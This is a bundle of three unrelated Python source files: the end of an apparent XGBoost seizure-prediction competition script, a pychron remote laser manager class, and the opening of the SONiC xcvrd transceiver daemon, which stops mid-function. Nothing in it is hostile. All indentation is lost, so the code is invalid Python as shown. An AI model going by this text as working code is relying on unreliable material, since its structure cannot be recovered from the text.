# print('Go for ' + fl)
id_str = os.path.basename(fl)[:-4]
arr = id_str.split("_")
patient = int(arr[0])
id = int(arr[1])
result = int(arr[2])
new_id = patient*100000 + id
try:
tables, sequence_from_mat = mat_to_pandas(fl)
except:
print('Some error here {}...'.format(fl))
continue
out_str += str(new_id) + "," + str(sequence_id) + "," + str(patient)
for f in sorted(list(tables.columns.values)):
mean = tables[f].mean()
out_str += "," + str(mean)
out_str += "," + str(os.path.getsize(fl)) + "," + str(result) + "\n"
if total % 6 == 0:
if int(sequence_from_mat) != 6:
print('Check error! {}'.format(sequence_from_mat))
exit()
sequence_id += 1
out.write(out_str)
# TRAIN (1)
out_str = ''
files = sorted(glob.glob("../input/train_" + str(patient_id) + "/*1.mat"), key=natural_key)
sequence_id += 1
total = 0
for fl in files:
total += 1
# print('Go for ' + fl)
id_str = os.path.basename(fl)[:-4]
arr = id_str.split("_")
patient = int(arr[0])
id = int(arr[1])
result = int(arr[2])
new_id = patient*100000 + id
try:
tables, sequence_from_mat = mat_to_pandas(fl)
except:
print('Some error here {}...'.format(fl))
continue
out_str += str(new_id) + "," + str(sequence_id) + "," + str(patient)
for f in sorted(list(tables.columns.values)):
mean = tables[f].mean()
out_str += "," + str(mean)
out_str += "," + str(os.path.getsize(fl)) + "," + str(result) + "\n"
if total % 6 == 0:
if int(sequence_from_mat) != 6:
print('Check error! {}'.format(sequence_from_mat))
exit()
sequence_id += 1
out.write(out_str)
out.close()
print('Train CSV for patient {} has been completed...'.format(patient_id))
def create_simple_csv_test(patient_id):
# TEST
out_str = ''
files = sorted(glob.glob("../input/test_" + str(patient_id) + "_new/*.mat"), key=natural_key)
out = open("simple_test_" + str(patient_id) + ".csv", "w")
out.write("Id,patient_id")
for i in range(16):
out.write(",avg_" + str(i))
out.write(",file_size\n")
for fl in files:
# print('Go for ' + fl)
id_str = os.path.basename(fl)[:-4]
arr = id_str.split("_")
patient = int(arr[1])
id = int(arr[2])
new_id = patient*100000 + id
try:
tables, sequence_from_mat = mat_to_pandas(fl)
except:
print('Some error here {}...'.format(fl))
continue
out_str += str(new_id) + "," + str(patient)
for f in sorted(list(tables.columns.values)):
mean = tables[f].mean()
out_str += "," + str(mean)
out_str += "," + str(os.path.getsize(fl)) + "\n"
# break
out.write(out_str)
out.close()
print('Test CSV for patient {} has been completed...'.format(patient_id))
def run_single(train, test, features, target, random_state=1):
eta = 0.2
max_depth = 3
subsample = 0.9
colsample_bytree = 0.9
start_time = time.time()
print('XGBoost params. ETA: {}, MAX_DEPTH: {}, SUBSAMPLE: {}, COLSAMPLE_BY_TREE: {}'.format(eta, max_depth, subsample, colsample_bytree))
params = {
"objective": "binary:logistic",
"booster" : "gbtree",
"eval_metric": "auc",
"eta": eta,
"tree_method": 'exact',
"max_depth": max_depth,
"subsample": subsample,
"colsample_bytree": colsample_bytree,
"silent": 1,
"seed": random_state,
}
num_boost_round = 1000
early_stopping_rounds = 50
test_size = 0.2
unique_sequences = np.array(train['sequence_id'].unique())
kf = KFold(len(unique_sequences), n_folds=int(round(1/test_size, 0)), shuffle=True, random_state=random_state)
train_seq_index, test_seq_index = list(kf)[0]
print('Length of sequence train: {}'.format(len(train_seq_index)))
print('Length of sequence valid: {}'.format(len(test_seq_index)))
train_seq = unique_sequences[train_seq_index]
valid_seq = unique_sequences[test_seq_index]
X_train, X_valid = train[train['sequence_id'].isin(train_seq)][features], train[train['sequence_id'].isin(valid_seq)][features]
y_train, y_valid = train[train['sequence_id'].isin(train_seq)][target], train[train['sequence_id'].isin(valid_seq)][target]
X_test = test[features]
print('Length train:', len(X_train))
print('Length valid:', len(X_valid))
dtrain = xgb.DMatrix(X_train, y_train)
dvalid = xgb.DMatrix(X_valid, y_valid)
watchlist = [(dtrain, 'train'), (dvalid, 'eval')]
gbm = xgb.train(params, dtrain, num_boost_round, evals=watchlist,
early_stopping_rounds=early_stopping_rounds, verbose_eval=True)
print("Validating...")
check = gbm.predict(xgb.DMatrix(X_valid), ntree_limit=gbm.best_iteration+1)
score = roc_auc_score(y_valid, check)
print('Check error value: {:.6f}'.format(score))
imp = get_importance(gbm, features)
print('Importance array: ', imp)
print("Predict test set...")
test_prediction = gbm.predict(xgb.DMatrix(X_test), ntree_limit=gbm.best_iteration+1)
print('Training time: {} minutes'.format(round((time.time() - start_time)/60, 2)))
return test_prediction.tolist(), score
def run_kfold(nfolds, train, test, features, target, random_state=2016):
eta = 0.2
max_depth = 3
subsample = 0.7
colsample_bytree = 0.7
start_time = time.time()
print('XGBoost params. ETA: {}, MAX_DEPTH: {}, SUBSAMPLE: {}, COLSAMPLE_BY_TREE: {}'.format(eta, max_depth, subsample, colsample_bytree))
params = {
"objective": "binary:logistic",
"booster" : "gbtree",
"eval_metric": "auc",
"eta": eta,
"tree_method": 'exact',
"max_depth": max_depth,
"subsample": subsample,
"colsample_bytree": colsample_bytree,
"silent": 1,
"seed": random_state,
}
num_boost_round = 1000
early_stopping_rounds = 50
yfull_train = dict()
yfull_test = copy.deepcopy(test[['Id']].astype(object))
unique_sequences = np.array(train['sequence_id'].unique())
kf = KFold(len(unique_sequences), n_folds=nfolds, shuffle=True, random_state=random_state)
num_fold = 0
for train_seq_index, test_seq_index in kf:
num_fold += 1
print('Start fold {} from {}'.format(num_fold, nfolds))
train_seq = unique_sequences[train_seq_index]
valid_seq = unique_sequences[test_seq_index]
print('Length of train people: {}'.format(len(train_seq)))
print('Length of valid people: {}'.format(len(valid_seq)))
X_train, X_valid = train[train['sequence_id'].isin(train_seq)][features], train[train['sequence_id'].isin(valid_seq)][features]
y_train, y_valid = train[train['sequence_id'].isin(train_seq)][target], train[train['sequence_id'].isin(valid_seq)][target]
X_test = test[features]
print('Length train:', len(X_train))
print('Length valid:', len(X_valid))
dtrain = xgb.DMatrix(X_train, y_train)
dvalid = xgb.DMatrix(X_valid, y_valid)
watchlist = [(dtrain, 'train'), (dvalid, 'eval')]
gbm = xgb.train(params, dtrain, num_boost_round, evals=watchlist, early_stopping_rounds=early_stopping_rounds, verbose_eval=1000)
yhat = gbm.predict(xgb.DMatrix(X_valid), ntree_limit=gbm.best_iteration+1)
# Each time store portion of precicted data in train predicted values
for i in range(len(X_valid.index)):
yfull_train[X_valid.index[i]] = yhat[i]
print("Validating...")
check = gbm.predict(xgb.DMatrix(X_valid), ntree_limit=gbm.best_iteration+1)
score = roc_auc_score(y_valid.tolist(), check)
print('Check error value: {:.6f}'.format(score))
imp = get_importance(gbm, features)
print('Importance array: ', imp)
print("Predict test set...")
test_prediction = gbm.predict(xgb.DMatrix(X_test), ntree_limit=gbm.best_iteration+1)
yfull_test['kfold_' + str(num_fold)] = test_prediction
# Copy dict to list
train_res = []
for i in range(len(train.index)):
train_res.append(yfull_train[i])
score = roc_auc_score(train[target], np.array(train_res))
print('Check error value: {:.6f}'.format(score))
# Find mean for KFolds on test
merge = []
for i in range(1, nfolds+1):
merge.append('kfold_' + str(i))
yfull_test['mean'] = yfull_test[merge].mean(axis=1)
print('Training time: {} minutes'.format(round((time.time() - start_time)/60, 2)))
return yfull_test['mean'].values, score
def create_submission(score, test, prediction):
# Make Submission
now = datetime.datetime.now()
sub_file = 'submission_' + str(score) + '_' + str(now.strftime("%Y-%m-%d-%H-%M")) + '.csv'
print('Writing submission: ', sub_file)
f = open(sub_file, 'w')
f.write('File,Class\n')
total = 0
for id in test['Id']:
patient = id // 100000
fid = id % 100000
str1 = 'new_' + str(patient) + '_' + str(fid) + '.mat' + ',' + str(prediction[total])
str1 += '\n'
total += 1
f.write(str1)
f.close()
def get_features(train, test):
trainval = list(train.columns.values)
testval = list(test.columns.values)
output = intersect(trainval, testval)
output.remove('Id')
# output.remove('file_size')
return sorted(output)
def read_test_train():
print("Load train.csv...")
train1 = pd.read_csv("simple_train_1.csv")
train2 = pd.read_csv("simple_train_2.csv")
train3 = pd.read_csv("simple_train_3.csv")
train = pd.concat([train1, train2, train3])
# Remove all zeroes files
train = train[train['file_size'] > 55000].copy()
# Shuffle rows since they are ordered
train = train.iloc[np.random.permutation(len(train))]
# Reset broken index
train = train.reset_index()
print("Load test.csv...")
test1 = pd.read_csv("simple_test_1.csv")
test2 = pd.read_csv("simple_test_2.csv")
test3 = pd.read_csv("simple_test_3.csv")
test = pd.concat([test1, test2, test3])
print("Process tables...")
features = get_features(train, test)
return train, test, features
if __name__ == '__main__':
print('XGBoost: {}'.format(xgb.__version__))
if 1:
# Do reading and processing of MAT files in parallel
p = dict()
p[1] = Process(target=create_simple_csv_train, args=(1,))
p[1].start()
p[2] = Process(target=create_simple_csv_train, args=(2,))
p[2].start()
p[3] = Process(target=create_simple_csv_train, args=(3,))
p[3].start()
p[4] = Process(target=create_simple_csv_test, args=(1,))
p[4].start()
p[5] = Process(target=create_simple_csv_test, args=(2,))
p[5].start()
p[6] = Process(target=create_simple_csv_test, args=(3,))
p[6].start()
p[1].join()
p[2].join()
p[3].join()
p[4].join()
p[5].join()
p[6].join()
train, test, features = read_test_train()
print('Length of train: ', len(train))
print('Length of test: ', len(test))
print('Features [{}]: {}'.format(len(features), sorted(features)))
# test_prediction, score = run_single(train, test, features, 'result')
test_prediction, score = run_kfold(5, train, test, features, 'result')
create_submission(score, test, test_prediction)
|
remote_laser_manager.py
|
# ===============================================================================
# Copyright 2019 ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from traits.api import Float, Property, Bool, Button, String, Enum
from pychron.core.ui.thread import Thread
from pychron.globals import globalv
from pychron.lasers.laser_managers.base_lase_manager import BaseLaserManager
class RemoteLaserManager(BaseLaserManager):
position = String(enter_set=True, auto_set=False)
x = Property(depends_on="_x")
y = Property(depends_on="_y")
z = Property(depends_on="_z")
_x = Float
_y = Float
_z = Float
connected = Bool
test_connection_button = Button("Test Connection")
snapshot_button = Button("Test Snapshot")
use_autocenter = Bool(False)
output_power = Float(enter_set=True, auto_set=False)
fire_laser_button = Button
fire_label = Property(depends_on="_firing")
units = Enum("watts", "percent")
_patterning = False
_firing = Bool(False)
_is_moving = Bool(False)
stage_stop_button = Button("Stage Stop")
move_enabled_button = Button("Enable Move")
move_enabled_label = Property(depends_on="_move_enabled")
_move_enabled = Bool(False)
update_position_button = Button
def open(self, *args, **kw):
raise NotImplementedError
def opened(self):
self.debug("opened")
if self.update_position():
self._opened_hook()
return True
def update_position(self):
pos = super(RemoteLaserManager, self).update_position()
if pos:
self.trait_set(**dict(zip(("_x", "_y", "_z"), pos)))
return True
# private
def _update_position_button_fired(self):
if not self.simulation:
self.update_position()
def _test_connection_button_fired(self):
self.test_connection()
if self.connected:
self.opened()
def _test_connection_hook(self):
pass
def _test_connection(self):
if self.simulation:
return globalv.communication_simulation, None
else:
self.connected = False
if self.setup_communicator():
self._test_connection_hook()
self.debug("test connection. connected= {}".format(self.connected))
return self.connected, None
def _position_changed(self):
if self.position is not None:
t = Thread(
target=self._move_to_position, args=(self.position, self.use_autocenter)
)
t.start()
self._position_thread = t
def _enable_fired(self):
if self.enabled:
self.disable_laser()
self.enabled = False
else:
if self.enable_laser():
self.enabled = True
def _get_move_enabled_label(self):
return "Enable Axis Moves" if not self._move_enabled else "Disable Axis Moves"
def _get_fire_label(self):
return "Fire" if not self._firing else "Stop"
def _move_enabled_button_fired(self):
self._move_enabled = not self._move_enabled
def _opened_hook(self):
pass
def _get_x(self):
return self._x
def _get_y(self):
return self._y
def _get_z(self):
return self._z
# ============= EOF =============================================
|
xcvrd.py
|
#!/usr/bin/env python2
"""
xcvrd
Transceiver information update daemon for SONiC
"""
try:
import ast
import json
import multiprocessing
import os
import signal
import sys
import threading
import time
from enum import Enum
from sonic_py_common import daemon_base, device_info, logger
from sonic_py_common import multi_asic
from swsscommon import swsscommon
from .xcvrd_utilities import y_cable_helper
except ImportError as e:
raise ImportError(str(e) + " - required module not found")
#
# Constants ====================================================================
#
SYSLOG_IDENTIFIER = "xcvrd"
PLATFORM_SPECIFIC_MODULE_NAME = "sfputil"
PLATFORM_SPECIFIC_CLASS_NAME = "SfpUtil"
TRANSCEIVER_INFO_TABLE = 'TRANSCEIVER_INFO'
TRANSCEIVER_DOM_SENSOR_TABLE = 'TRANSCEIVER_DOM_SENSOR'
TRANSCEIVER_STATUS_TABLE = 'TRANSCEIVER_STATUS'
SELECT_TIMEOUT_MSECS = 1000
DOM_INFO_UPDATE_PERIOD_SECS = 60
TIME_FOR_SFP_READY_SECS = 1
XCVRD_MAIN_THREAD_SLEEP_SECS = 60
# SFP status definition, shall be aligned with the definition in get_change_event() of ChassisBase
SFP_STATUS_REMOVED = '0'
SFP_STATUS_INSERTED = '1'
# SFP error code enum, new elements can be added to the enum if new errors need to be supported.
SFP_STATUS_ERR_ENUM = Enum('SFP_STATUS_ERR_ENUM', ['SFP_STATUS_ERR_I2C_STUCK', 'SFP_STATUS_ERR_BAD_EEPROM',
'SFP_STATUS_ERR_UNSUPPORTED_CABLE', 'SFP_STATUS_ERR_HIGH_TEMP',
'SFP_STATUS_ERR_BAD_CABLE'], start=2)
# Convert the error code to string and store them in a set for convenience
errors_block_eeprom_reading = set(str(error_code.value) for error_code in SFP_STATUS_ERR_ENUM)
EVENT_ON_ALL_SFP = '-1'
# events definition
SYSTEM_NOT_READY = 'system_not_ready'
SYSTEM_BECOME_READY = 'system_become_ready'
SYSTEM_FAIL = 'system_fail'
NORMAL_EVENT = 'normal'
# states definition
STATE_INIT = 0
STATE_NORMAL = 1
STATE_EXIT = 2
PHYSICAL_PORT_NOT_EXIST = -1
SFP_EEPROM_NOT_READY = -2
SFPUTIL_LOAD_ERROR = 1
PORT_CONFIG_LOAD_ERROR = 2
NOT_IMPLEMENTED_ERROR = 3
SFP_SYSTEM_ERROR = 4
RETRY_TIMES_FOR_SYSTEM_READY = 24
RETRY_PERIOD_FOR_SYSTEM_READY_MSECS = 5000
RETRY_TIMES_FOR_SYSTEM_FAIL = 24
RETRY_PERIOD_FOR_SYSTEM_FAIL_MSECS = 5000
TEMP_UNIT = 'C'
VOLT_UNIT = 'Volts'
POWER_UNIT = 'dBm'
BIAS_UNIT = 'mA'
media_settings = ''
g_dict = {}
# Global platform specific sfputil class instance
platform_sfputil = None
# Global chassis object based on new platform api
platform_chassis = None
# Global logger instance for helper functions and classes
# TODO: Refactor so that we only need the logger inherited
# by DaemonXcvrd
helper_logger = logger.Logger(SYSLOG_IDENTIFIER)
#
# Helper functions =============================================================
#
# Find out the underneath physical port list by logical name
def logical_port_name_to_physical_port_list(port_name):
try:
return [int(port_name)]
except ValueError:
if platform_sfputil.is_logical_port(port_name):
return platform_sfputil.get_logical_to_physical(port_name)
else:
helper_logger.log_error("Invalid port '{}'".format(port_name))
return None
# Get physical port name
def get_physical_port_name(logical_port, physical_port, ganged):
if logical_port == physical_port:
return logical_port
elif ganged:
return logical_port + ":{} (ganged)".format(physical_port)
else:
return logical_port
# Strip units and beautify
def strip_unit_and_beautify(value, unit):
# Strip unit from raw data
if type(value) is str:
width = len(unit)
if value[-width:] == unit:
value = value[:-width]
return value
else:
return str(value)
def _wrapper_get_presence(physical_port):
if platform_chassis is not None:
try:
return platform_chassis.get_sfp(physical_port).get_presence()
except NotImplementedError:
pass
return platform_sfputil.get_presence(physical_port)
def _wrapper_is_replaceable(physical_port):
if platform_chassis is not None:
try:
return platform_chassis.get_sfp(physical_port).is_replaceable()
except NotImplementedError:
pass
return False
def _wrapper_get_transceiver_info(physical_port):
if platform_chassis is not None:
try:
return platform_chassis.get_sfp(physical_port).get_transceiver_info()
except NotImplementedError:
pass
return platform_sfputil.get_transceiver_info_dict(physical_port)
def _wrapper_get_transceiver_dom_info(physical_port):
if platform_chassis is not None:
try:
return platform_chassis.get_sfp(physical_port).get_transceiver_bulk_status()
except NotImplementedError:
pass
return platform_sfputil.get_transceiver_dom_info_dict(physical_port)
def _wrapper_get_transceiver_dom_threshold_info(physical_port):
if platform_chassis is not None:
try:
return platform_chassis.get_sfp(physical_port).get_transceiver_threshold_info()
except NotImplementedError:
pass
return platform_sfputil.get_transceiver_dom_threshold_info_dict(physical_port)
def _wrapper_get_transceiver_change_event(timeout):
if platform_chassis is not None:
try:
status, events = platform_chassis.get_change_event(timeout)
sfp_events = events['sfp']
return status, sfp_events
except NotImplementedError:
pass
return platform_sfputil.get_transceiver_change_event(timeout)
def _wrapper_get_sfp_type(physical_port):
if platform_chassis:
try:
return platform_chassis.get_sfp(physical_port).sfp_type
except (NotImplementedError, AttributeError):
pass
return None
# Remove unnecessary unit from the raw data
def beautify_dom_info_dict(dom_info_dict):
dom_info_dict['temperature'] = strip_unit_and_beautify(dom_info_dict['temperature'], TEMP_UNIT)
dom_info_dict['voltage'] = strip_unit_and_beautify(dom_info_dict['voltage'], VOLT_UNIT)
dom_info_dict['rx1power'] = strip_unit_and_beautify(dom_info_dict['rx1power'], POWER_UNIT)
dom_info_dict['rx2power'] = strip_unit_and_beautify(dom_info_dict['rx2power'], POWER_UNIT)
dom_info_dict['rx3power'] = strip_unit_and_beautify(dom_info_dict['rx3power'], POWER_UNIT)
dom_info_dict['rx4power'] = strip_unit_and_beautify(dom_info_dict['rx4power'], POWER_UNIT)
dom_info_dict['tx1bias'] = strip_unit_and_beautify(dom_info_dict['tx1bias'], BIAS_UNIT)
dom_info_dict['tx2bias'] = strip_unit_and_beautify(dom_info_dict['tx2bias'], BIAS_UNIT)
dom_info_dict['tx3bias'] = strip_unit_and_beautify(dom_info_dict['tx3bias'], BIAS_UNIT)
dom_info_dict['tx4bias'] = strip_unit_and_beautify(dom_info_dict['tx4bias'], BIAS_UNIT)
dom_info_dict['tx1power'] = strip_unit_and_beautify(dom_info_dict['tx1power'], POWER_UNIT)
dom_info_dict['tx2power'] = strip_unit_and_beautify(dom_info_dict['tx2power'], POWER_UNIT)
dom_info_dict['tx3power'] = strip_unit_and_beautify(dom_info_dict['tx3power'], POWER_UNIT)
dom_info_dict['tx4power'] = strip_unit_and_beautify(dom_info_dict['tx4power'], POWER_UNIT)
def beautify_dom_threshold_info_dict(dom_info_dict):
dom_info_dict['temphighalarm'] = strip_unit_and_beautify(dom_info_dict['temphighalarm'], TEMP_UNIT)
dom_info_dict['temphighwarning'] = strip_unit_and_beautify(dom_info_dict['temphighwarning'], TEMP_UNIT)
dom_info_dict['templowalarm'] = strip_unit_and_beautify(dom_info_dict['templowalarm'], TEMP_UNIT)
dom_info_dict['templowwarning'] = strip_unit_and_beautify(dom_info_dict['templowwarning'], TEMP_UNIT)
dom_info_dict['vcchighalarm'] = strip_unit_and_beautify(dom_info_dict['vcchighalarm'], VOLT_UNIT)
dom_info_dict['vcchighwarning'] = strip_unit_and_beautify(dom_info_dict['vcchighwarning'], VOLT_UNIT)
dom_info_dict['vcclowalarm'] = strip_unit_and_beautify(dom_info_dict['vcclowalarm'], VOLT_UNIT)
dom_info_dict['vcclowwarning'] = strip_unit_and_beautify(dom_info_dict['vcclowwarning'], VOLT_UNIT)
dom_info_dict['txpowerhighalarm'] = strip_unit_and_beautify(dom_info_dict['txpowerhighalarm'], POWER_UNIT)
dom_info_dict['txpowerlowalarm'] = strip_unit_and_beautify(dom_info_dict['txpowerlowalarm'], POWER_UNIT)
dom_info_dict['txpowerhighwarning'] = strip_unit_and_beautify(dom_info_dict['txpowerhighwarning'], POWER_UNIT)
dom_info_dict['txpowerlowwarning'] = strip_unit_and_beautify(dom_info_dict['txpowerlowwarning'], POWER_UNIT)
dom_info_dict['rxpowerhighalarm'] = strip_unit_and_beautify(dom_info_dict['rxpowerhighalarm'], POWER_UNIT)
dom_info_dict['rxpowerlowalarm'] = strip_unit_and_beautify(dom_info_dict['rxpowerlowalarm'], POWER_UNIT)
dom_info_dict['rxpowerhighwarning'] = strip_unit_and_beautify(dom_info_dict['rxpowerhighwarning'], POWER_UNIT)
dom_info_dict['rxpowerlowwarning'] = strip_unit_and_beautify(dom_info_dict['rxpowerlowwarning'], POWER_UNIT)
dom_info_dict['txbiashighalarm'] = strip_unit_and_beautify(dom_info_dict['txbiashighalarm'], BIAS_UNIT)
dom_info_dict['txbiaslowalarm'] = strip_unit_and_beautify(dom_info_dict['txbiaslowalarm'], BIAS_UNIT)
dom_info_dict['txbiashighwarning'] = strip_unit_and_beautify(dom_info_dict['txbiashighwarning'], BIAS_UNIT)
dom_info_dict['txbiaslowwarning'] = strip_unit_and_beautify(dom_info_dict['txbiaslowwarning'], BIAS_UNIT)
# Update port sfp info in db
def post_port_sfp_info_to_db(logical_port_name, table, transceiver_dict,
stop_event=threading.Event()):
ganged_port = False
ganged_member_num = 1
physical_port_list = logical_port_name_to_physical_port_list(logical_port_name)
if physical_port_list is None:
helper_logger.log_error("No physical ports found for logical port '{}'".format(logical_port_name))
return PHYSICAL_PORT_NOT_EXIST
if len(physical_port_list) > 1:
ganged_port = True
for physical_port in physical_port_list:
if stop_event.is_set():
break
if not _wrapper_get_presence(physical_port):
continue
port_name = get_physical_port_name(logical_port_name, ganged_member_num, ganged_port)
ganged_member_num += 1
try:
port_info_dict = _wrapper_get_transceiver_info(physical_port)
if port_info_dict is not None:
is_replaceable = _wrapper_is_replaceable(physical_port)
transceiver_dict[physical_port] = port_info_dict
fvs = swsscommon.FieldValuePairs(
[('type', port_info_dict['type']),
('hardware_rev', port_info_dict['hardware_rev']),
('serial', port_info_dict['serial']),
('manufacturer', port_info_dict['manufacturer']),
('model', port_info_dict['model']),
('vendor_oui', port_info_dict['vendor_oui']),
('vendor_date', port_info_dict['vendor_date']),
('connector', port_info_dict['connector']),
('encoding', port_info_dict['encoding']),
('ext_identifier', port_info_dict['ext_identifier']),
('ext_rateselect_compliance', port_info_dict['ext_rateselect_compliance']),
('cable_type', port_info_dict['cable_type']),
('cable_length', port_info_dict['cable_length']),
('specification_compliance', port_info_dict['specification_compliance']),
('nominal_bit_rate', port_info_dict['nominal_bit_rate']),
('application_advertisement', port_info_dict['application_advertisement']
if 'application_advertisement' in port_info_dict else 'N/A'),
('is_replaceable', str(is_replaceable)),
('dom_capability', port_info_dict['dom_capability']
if 'dom_capability' in port_info_dict else 'N/A'),
])
table.set(port_name, fvs)
else:
return SFP_EEPROM_NOT_READY
except NotImplementedError:
helper_logger.log_error("This functionality is currently not implemented for this platform")
sys.exit(NOT_IMPLEMENTED_ERROR)
# Update port dom threshold info in db
def post_port_dom_threshold_info_to_db(logical_port_name, table,
stop=threading.Event()):
ganged_port = False
ganged_member_num = 1
physical_port_list = logical_port_name_to_physical_port_list(logical_port_name)
if physical_port_list is None:
helper_logger.log_error("No physical ports found for logical port '{}'".format(logical_port_name))
return PHYSICAL_PORT_NOT_EXIST
if len(physical_port_list) > 1:
ganged_port = True
for physical_port in physical_port_list:
if stop.is_set():
break
if not _wrapper_get_presence(physical_port):
continue
port_name = get_physical_port_name(logical_port_name,
ganged_member_num, ganged_port)
ganged_member_num += 1
try:
dom_info_dict = _wrapper_get_transceiver_dom_threshold_info(physical_port)
if dom_info_dict is not None:
beautify_dom_threshold_info_dict(dom_info_dict)
fvs = swsscommon.FieldValuePairs(
[('temphighalarm', dom_info_dict['temphighalarm']),
('temphighwarning', dom_info_dict['temphighwarning']),
('templowalarm', dom_info_dict['templowalarm']),
('templowwarning', dom_info_dict['templowwarning']),
('vcchighalarm', dom_info_dict['vcchighalarm']),
('vcchighwarning', dom_info_dict['vcchighwarning']),
('vcclowalarm', dom_info_dict['vcclowalarm']),
('vcclowwarning', dom_info_dict['vcclowwarning']),
('txpowerhighalarm', dom_info_dict['txpowerhighalarm']),
('txpowerlowalarm', dom_info_dict['txpowerlowalarm']),
('txpowerhighwarning', dom_info_dict['txpowerhighwarning']),
('txpowerlowwarning', dom_info_dict['txpowerlowwarning']),
('rxpowerhighalarm', dom_info_dict['rxpowerhighalarm']),
('rxpowerlowalarm', dom_info_dict['rxpowerlowalarm']),
('rxpowerhighwarning', dom_info_dict['rxpowerhighwarning']),
('rxpowerlowwarning', dom_info_dict['rxpowerlowwarning']),
('txbiashighalarm', dom_info_dict['txbiashighalarm']),
('txbiaslowalarm', dom_info_dict['txbiaslowalarm']),
('txbiashighwarning', dom_info_dict['txbiashighwarning']),
('txbiaslowwarning', dom_info_dict['txbiaslowwarning'])
])
table.set(port_name, fvs)
else:
return SFP_EEPROM_NOT_READY
except NotImplementedError:
helper_logger.log_error("This functionality is currently not implemented for this platform")
sys.exit(NOT_IMPLEMENTED_ERROR)
# Update port dom sensor info in db
def post_port_dom_info_to_db(logical_port_name, table, stop_event=threading.Event()):
ganged_port = False
ganged_member_num = 1
physical_port_list = logical_port_name_to_physical_port_list(logical_port_name)
if physical_port_list is None:
helper_logger.log_error("No physical ports found for logical port '{}'".format(logical_port_name))
return PHYSICAL_PORT_NOT_EXIST
if len(physical_port_list) > 1:
ganged_port = True
for physical_port in physical_port_list:
if stop_event.is_set():
break
if not _wrapper_get_presence(physical_port):
continue
port_name = get_physical_port_name(logical_port_name, ganged_member_num, ganged_port)
ganged_member_num += 1
try:
dom_info_dict = _wrapper_get_transceiver_dom_info(physical_port)
if dom_info_dict is not None:
beautify_dom_info_dict(dom_info_dict)
if _wrapper_get_sfp_type(physical_port) == 'QSFP_DD':
fvs = swsscommon.FieldValuePairs(
[('temperature', dom_info_dict['temperature']),
('voltage', dom_info_dict['voltage']),
('rx1power', dom_info_dict['rx1power']),
('rx2power', dom_info_dict['rx2power']),
('rx3power', dom_info_dict['rx3power']),
('rx4power', dom_info_dict['rx4power']),
('rx5power', dom_info_dict['rx5power']),
('rx6power', dom_info_dict['rx6power']),
('rx7power', dom_info_dict['rx7power']),
('rx8power', dom_info_dict['rx8power']),
('tx1bias', dom_info_dict['tx1bias']),
('tx2bias', dom_info_dict['tx2bias']),
('tx3bias', dom_info_dict['tx3bias']),
('tx4bias', dom_info_dict['tx4bias']),
('tx5bias', dom_info_dict['tx5bias']),
('tx6bias', dom_info_dict['tx6bias']),
('tx7bias', dom_info_dict['tx7bias']),
('tx8bias', dom_info_dict['tx8bias']),
('tx1power', dom_info_dict['tx1power']),
('tx2power', dom_info_dict['tx2power']),
('tx3power', dom_info_dict['tx3power']),
('tx4power', dom_info_dict['tx4power']),
('tx5power', dom_info_dict['tx5power']),
('tx6power', dom_info_dict['tx6power']),
('tx7power', dom_info_dict['tx7power']),
('tx8power', dom_info_dict['tx8power'])
])
else:
fvs = swsscommon.FieldValuePairs(
[('temperature', dom_info_dict['temperature']),
('voltage', dom_info_dict['voltage']),
('rx1power', dom_info_dict['rx1power']),
('rx2power', dom_info_dict['rx2power']),
('rx3power', dom_info_dict['rx3power']),
('rx4power', dom_info_dict['rx4power']),
('tx1bias', dom_info_dict['tx1bias']),
('tx2bias', dom_info_dict['tx2bias']),
('tx3bias', dom_info_dict['tx3bias']),
('tx4bias', dom_info_dict['tx4bias']),
('tx1power', dom_info_dict['tx1power']),
('tx2power', dom_info_dict['tx2power']),
('tx3power', dom_info_dict['tx3power']),
('tx4power', dom_info_dict['tx4power'])
])
table.set(port_name, fvs)
else:
return SFP_EEPROM_NOT_READY
except NotImplementedError:
helper_logger.log_error("This functionality is currently not implemented for this platform")
sys.exit(NOT_IMPLEMENTED_ERROR)
# Update port dom/sfp info in db
def post_port_sfp_dom_info_to_db(is_warm_start, stop_event=threading.Event()):
# Connect to STATE_DB and create transceiver dom/sfp info tables
transceiver_dict, state_db, appl_db, int_tbl, dom_tbl, app_port_tbl = {}, {}, {}, {}, {}, {}
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
appl_db[asic_id] = daemon_base.db_connect("APPL_DB", namespace)
int_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_INFO_TABLE)
dom_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_DOM_SENSOR_TABLE)
app_port_tbl[asic_id] = swsscommon.ProducerStateTable(appl_db[asic_id], swsscommon.APP_PORT_TABLE_NAME)
# Post all the current interface dom/sfp info to STATE_DB
logical_port_list = platform_sfputil.logical
for logical_port_name in logical_port_list:
if stop_event.is_set():
break
# Get the asic to which this port belongs
asic_index = platform_sfputil.get_asic_id_for_logical_port(logical_port_name)
if asic_index is None:
logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port_name))
continue
post_port_sfp_info_to_db(logical_port_name, int_tbl[asic_index], transceiver_dict, stop_event)
post_port_dom_info_to_db(logical_port_name, dom_tbl[asic_index], stop_event)
post_port_dom_threshold_info_to_db(logical_port_name, dom_tbl[asic_index], stop_event)
# Do not notify media settings during warm reboot to avoid dataplane traffic impact
if is_warm_start == False:
notify_media_setting(logical_port_name, transceiver_dict, app_port_tbl[asic_index])
transceiver_dict.clear()
# Delete port dom/sfp info from db
def del_port_sfp_dom_info_from_db(logical_port_name, int_tbl, dom_tbl):
ganged_port = False
ganged_member_num = 1
physical_port_list = logical_port_name_to_physical_port_list(logical_port_name)
if physical_port_list is None:
helper_logger.log_error("No physical ports found for logical port '{}'".format(logical_port_name))
return PHYSICAL_PORT_NOT_EXIST
if len(physical_port_list) > 1:
ganged_port = True
for physical_port in physical_port_list:
port_name = get_physical_port_name(logical_port_name, ganged_member_num, ganged_port)
ganged_member_num += 1
try:
if int_tbl != None:
int_tbl._del(port_name)
if dom_tbl != None:
dom_tbl._del(port_name)
except NotImplementedError:
